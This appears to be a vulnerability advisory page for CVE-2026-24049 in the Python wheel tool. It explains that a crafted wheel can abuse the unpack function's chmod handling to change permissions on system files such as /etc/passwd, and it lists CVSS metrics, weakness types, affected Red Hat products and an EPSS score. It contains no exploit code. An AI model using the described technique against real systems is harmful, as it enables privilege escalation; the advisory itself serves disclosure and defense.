wheel 0.40.00.46.1: Permission Bypass via malicious wheel, PrivEsc
CVE-2026-24049 Published on January 22, 2026

wheel Allows Arbitrary File Permission Modification via Path Traversal
wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.

NVD

Vulnerability Analysis

CVE-2026-24049 can be exploited with local system access, requires user interaction. This vulnerability is considered to have a low attack complexity. Public availability of a proof of concept (POC) exploit exists for CVE-2026-24049. The potential impact of an exploit of this vulnerability is considered to have no impact on confidentiality, a high impact on integrity and availability.

Attack Vector:
LOCAL
Attack Complexity:
LOW
Privileges Required:
NONE
User Interaction:
REQUIRED
Scope:
UNCHANGED
Confidentiality Impact:
NONE
Integrity Impact:
HIGH
Availability Impact:
HIGH

Weakness Types

What is a Directory traversal Vulnerability?

The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

CVE-2026-24049 has been classified to as a Directory traversal vulnerability or weakness.

Incorrect Permission Assignment for Critical Resource

The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. When a resource is given a permissions setting that provides access to a wider range of actors than required, it could lead to the exposure of sensitive information, or the modification of that resource by unintended parties. This is especially dangerous when the resource is related to program configuration, execution or sensitive user data.


Products Associated with CVE-2026-24049

Want to know whenever a new CVE is published for Red Hat products? stack.watch will email you.

Red Hat Discovery
 
Red Hat Ansible Automation Platform
 
Red Hat Ansible Automation Platform Developer
 
Red Hat Ansible Automation Platform Inside
 
Red Hat Enterprise Linux (RHEL)
 
Red Hat Rhel Eus
 
Red Hat Enterprise Linux Eus
 
Red Hat Network Observ Optr
 
Red Hat Ai Inference Server
 
Red Hat Rhdh
 
Red Hat Openshift Ai
 
Red Hat Openshift
 
Red Hat Openshift Devspaces
 
Red Hat Stf
 
Red Hat Quay
 
Red Hat Satellite
 
Red Hat Trusted Artifact Signer
 
Red Hat Logging
 
Red Hat Migration Toolkit Virtualization
 
Red Hat Openshift Lightspeed
 
Red Hat Advanced Cluster Security
 
Red Hat Enterprise Linux Ai
 
Red Hat Workload Availability Far
 
Red Hat Multicluster Engine
 
Red Hat Service Mesh
 
Red Hat Ansible Core
 

Affected Versions

pypa wheel: Red Hat Discovery 2 for RHEL 10: Red Hat Ansible Automation Platform 2.5 for RHEL 8: Red Hat Discovery 2 for RHEL 8: Red Hat Ansible Automation Platform 2.5 for RHEL 9: Red Hat Ansible Automation Platform 2.6 for RHEL 9: Red Hat Discovery 2 for RHEL 9: Red Hat Enterprise Linux AppStream (v. 8): Red Hat Enterprise Linux AppStream EUS (v.9.4): Red Hat Enterprise Linux AppStream EUS (v.9.6): Red Hat Enterprise Linux AppStream (v. 9): Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0): Red Hat Enterprise Linux CodeReady Linux Builder (v. 10): Red Hat Enterprise Linux CRB (v. 8): Red Hat CodeReady Linux Builder EUS (v.9.4): Red Hat CodeReady Linux Builder EUS (v.9.6): Red Hat Enterprise Linux CodeReady Linux Builder (v. 9): Red Hat Network Observability (NETOBSERV) 1.11.2: Red Hat AI Inference Server 3.2: Red Hat Ansible Automation Platform 2.6: Red Hat Developer Hub 1.8: Red Hat Discovery 2: Red Hat OpenShift AI 2.25: Red Hat OpenShift AI 3.3: Red Hat OpenShift AI 3.4: Red Hat OpenShift Container Platform 4.16: Red Hat OpenShift Container Platform 4.17: Red Hat OpenShift Container Platform 4.18: Red Hat OpenShift Container Platform 4.19: Red Hat OpenShift Container Platform 4.20: Red Hat OpenShift Container Platform 4.21: Red Hat OpenShift Dev Spaces 3.27: Red Hat OpenStack 1.5: Red Hat Quay 3.12: Red Hat Quay 3.13: Red Hat Quay 3.14: Red Hat Quay 3.15: Red Hat Quay 3.16: Red Hat Quay 3.1: Red Hat Quay 3.9: Red Hat Satellite 6.18: Red Hat Trusted Artifact Signer 1.2: Red Hat Trusted Artifact Signer 1.3: Logging Subsystem for Red Hat OpenShift: Red Hat Migration Toolkit for Virtualization: Red Hat OpenShift Lightspeed: Red Hat Advanced Cluster Security 4: Red Hat AI Inference Server: Red Hat Ansible Automation Platform 2: Red Hat Enterprise Linux 6: Red Hat Enterprise Linux AI (RHEL AI) 3: Red Hat OpenShift AI (RHOAI): Red Hat OpenShift Container Platform 4: Red Hat OpenShift Dev Spaces: Red Hat Ansible Automation Platform 2.6 for RHEL 10: Red Hat Fence Agents Remediation Operator: Red Hat Multicluster Engine for Kubernetes: Red Hat OpenShift Service Mesh 2: Red Hat OpenShift Service Mesh 3: Red Hat Ansible Automation Platform Ansible Core 2: Red Hat Enterprise Linux 10: Red Hat Enterprise Linux 7: Red Hat Enterprise Linux 8: Red Hat Enterprise Linux 9: Red Hat Quay 3: Red Hat Satellite 6: Red Hat Service Telemetry Framework 1.5:

Exploit Probability

EPSS
0.28%
Percentile
19.35%

EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.